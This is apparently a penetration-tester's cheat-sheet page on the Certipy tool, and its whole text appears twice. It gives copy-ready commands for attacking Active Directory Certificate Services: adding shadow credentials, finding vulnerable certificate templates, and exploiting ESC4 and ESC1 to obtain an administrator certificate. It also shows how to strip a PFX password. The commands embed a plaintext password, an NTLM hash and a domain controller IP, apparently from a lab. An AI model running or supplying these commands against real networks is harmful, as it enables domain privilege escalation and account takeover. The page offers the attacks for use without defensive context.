Certipy

Get Shadow credentials

certipy-ad shadow auto -u '[email protected]' -p "WqSZAF6CysDQbGb3" -account 'user_2' -dc-ip '10.10.11.51'

Analyze ca-authority and find vulnerability

certipy find -u '[email protected]' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51

Exploit ESC4

Certipy template -username [email protected]  -hashes 3b181b914e7a9d5508ea1e20bc2b7fce  -template templateName  -save-old

Exploit ESC1

certipy-ad req -u user -target domain.local -upn [email protected] -ca sequel-DC01-CA -template template_name -hashes 3b181b914e7a9d5508ea1e20bc2b7fce:3b181b914e7a9d5508ea1e20bc2b7fce -key-size 4096  -dns 10.10.11.51 -dc-ip 10.10.11.51

Certipy's commands don't support PFXs with password. The following command can be used to "unprotect" a PFX file.

certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"

Risorse

https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate

PreviousPowerView Nextsqlmap

Last updated 22 days ago

Certipy

Get Shadow credentials

certipy-ad shadow auto -u '[email protected]' -p "WqSZAF6CysDQbGb3" -account 'user_2' -dc-ip '10.10.11.51'

Analyze ca-authority and find vulnerability

certipy find -u '[email protected]' -hashes '3b181b914e7a9d5508ea1e20bc2b7fce'  -dc-ip 10.10.11.51

Exploit ESC4

Certipy template -username [email protected]  -hashes 3b181b914e7a9d5508ea1e20bc2b7fce  -template templateName  -save-old

Exploit ESC1

certipy-ad req -u user -target domain.local -upn [email protected] -ca sequel-DC01-CA -template template_name -hashes 3b181b914e7a9d5508ea1e20bc2b7fce:3b181b914e7a9d5508ea1e20bc2b7fce -key-size 4096  -dns 10.10.11.51 -dc-ip 10.10.11.51

Certipy's commands don't support PFXs with password. The following command can be used to "unprotect" a PFX file.

certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"

Risorse

https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate

PreviousPowerView Nextsqlmap

Last updated 22 days ago